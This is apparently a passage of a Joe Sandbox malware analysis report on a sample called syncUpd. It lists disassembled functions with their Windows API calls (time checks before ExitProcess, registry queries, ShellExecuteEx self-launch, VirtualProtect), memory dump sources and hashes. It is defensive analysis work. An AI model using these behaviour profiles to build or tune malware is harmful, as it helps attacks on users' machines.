                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                              • String ID: L0A
                                                                                                                                                                                                                                                              • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                                              • Opcode ID: e2172ec72430fdbc39c38268b18b952bfe61bf5af391c888dca1e9bde3f94260
                                                                                                                                                                                                                                                              • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2172ec72430fdbc39c38268b18b952bfe61bf5af391c888dca1e9bde3f94260
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,0095C850,?,0041D8AC,?,00000000,?), ref: 0041362C
                                                                                                                                                                                                                                                              • sscanf.NTDLL ref: 00413659
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,0095C850,?,0041D8AC), ref: 00413672
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0095C850,?,0041D8AC), ref: 00413680
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041369A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                                                              • Opcode ID: 8c2208981a801284f9a28e2d75357d0f51d698fa75f1db0b96360f0b24201e4d
                                                                                                                                                                                                                                                              • Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c2208981a801284f9a28e2d75357d0f51d698fa75f1db0b96360f0b24201e4d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903847 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00903893
                                                                                                                                                                                                                                                              • sscanf.NTDLL ref: 009038C0
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009038D9
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009038E7
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903901
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                                                              • Opcode ID: 3210208c9ff9191fbd103aa9c2d0b3e8e7c47af46a118988f5807df95a5cb685
                                                                                                                                                                                                                                                              • Instruction ID: 1c16d3c2a14becf866bc1d02a36279e78b6ec33cf07aa73e5aa5bae966867787
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3210208c9ff9191fbd103aa9c2d0b3e8e7c47af46a118988f5807df95a5cb685
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A21CBB5D04209AFCF14EFE4D945AEEB7BABF8C300F04852EE516A3250EB346604CB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00415960 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00964850,?,?,?,0040F76C,?,00964850,00000000), ref: 0041596C
                                                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(00625310,00964850,00964850,?,0040F76C,?,00964850), ref: 00415990
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,0040F76C,?,00964850), ref: 004159A7
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004159C7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: %s%s
                                                                                                                                                                                                                                                              • API String ID: 1206339513-3252725368
                                                                                                                                                                                                                                                              • Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F14C7 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F14DB
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F14E2
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008F14FE
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008F151C
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 008F1526
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction ID: cacbb0c536fa9d96d1c6b08b5fa5545d3b5dfa8db46498b6dfc37d92246091fc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1011D79A40608BFDB20DFE0DD49FAEB779EB88700F008158FA06D7280DA709A018B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 009049A7 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009049BB
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 009049C2
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,006249D0,00000000,00020119,00000000), ref: 009049E2
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00624CD0,00000000,00000000,000000FF,000000FF), ref: 00904A03
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00904A0D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                              • Instruction ID: 910adedec35edc1c0adacb442230f952c6a414aa44e26dd97374909d5889c128
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5013CB5A40608FFDB20DBE4ED49FAEB77DEB88700F008158FA05E6290DA705A05CF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00904567 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0090457B
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00904582
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00624B8C,00000000,00020119,00000000), ref: 009045A2
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,00624C24,00000000,00000000,000000FF,000000FF), ref: 009045C3
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 009045CD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                                                                                                              • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                              • Instruction ID: df27af39871eac85fa499a90f279e62a18f215267ef7a5ef0115c327062f36d5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8201FFB5A40608BFDB20DBE4ED49FAEB77DEB88701F105154FA05E7294DB70AA05CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185B3
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185CA
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004185D8
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004185E8
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004185FC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              • Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                                                              • Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0090880E Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0090881A
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __getptd_noexit.LIBCMT ref: 00907D96
                                                                                                                                                                                                                                                                • Part of subcall function 00907D93: __amsg_exit.LIBCMT ref: 00907DA3
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00908831
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0090883F
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0090884F
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00908863
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              • Opcode ID: cc7480a914060d8b5643a9d0b0f25a761215b1338a518c63d358d0bb6fed0dfa
                                                                                                                                                                                                                                                              • Instruction ID: 37a6c3a712f3e2669aa60018902464df84a9875613768b192c02f5d7fdaf7857
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7480a914060d8b5643a9d0b0f25a761215b1338a518c63d358d0bb6fed0dfa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0B432F08310EFD721BBB4980771E77A1AF80731FA08129F8A4A71D3CF686941DA59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413415
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: b289bdfcdd97fb2c36f2262df7a6878459097f71b1333ec9b5e1507959396b69
                                                                                                                                                                                                                                                              • Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b289bdfcdd97fb2c36f2262df7a6878459097f71b1333ec9b5e1507959396b69
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00903557 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 0090358A
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0090364D
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0090367C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                                                              • Opcode ID: 966933ccc87c1a91f6790240733d41a2cf755532164395114738cccf7d819298
                                                                                                                                                                                                                                                              • Instruction ID: a34589eb461510bee07a53fb5ca9abb715456d1425302a0e8dcc599c36c01be4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 966933ccc87c1a91f6790240733d41a2cf755532164395114738cccf7d819298
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 613149B1C01218AEDB14EB90DC92FEEB778AF88300F805189F215661D1DF746B48CF64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
